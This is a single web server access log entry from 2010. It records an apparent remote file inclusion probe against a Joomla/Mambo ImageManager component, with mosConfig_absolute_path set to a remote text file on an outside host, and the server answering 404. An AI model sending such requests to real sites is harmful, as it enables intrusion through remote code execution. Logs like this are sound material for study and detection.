69.175.97.154 - - [25/Apr/2010:12:53:05 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
